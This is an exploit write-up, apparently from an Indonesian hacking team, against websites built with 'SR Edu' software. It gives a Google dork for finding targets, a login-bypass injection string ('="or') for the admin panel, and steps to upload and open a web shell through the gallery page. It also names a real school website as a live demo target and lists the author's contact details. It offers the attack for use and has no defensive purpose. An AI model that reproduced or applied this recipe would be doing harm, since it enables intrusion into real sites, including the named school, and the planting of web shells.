# Exploit Name : Created by SR Edu - Bypass Admin
# Author : ./Mi1337
# Team : Light Cyber Indonesia
# Blogspot : https://lightcyberindo.blogspot.com
# Risk : Medium
# Dork : intext:Created By SR Edu
# PoC
- Dorking on google using dork above
- Add /admin behind the website, will automatically be redirected to the login page (ex : localhost/admin)
- User : '="or' / Pass : '="or'
- Upload your shell at localhost:8080/admin/add-gallery.php
- Acces your shell at localhost:8080/admin/gallery/yourshell.php
# Demo
- http://carmelschoolbdk.com/admin/
# Greetz
- My Team : Light Cyber Indonesia (From Indonesia to World Team)
# Contact Me
- Email : jimmisetiawan54@gmail.com
- Telegram : t.me/misetya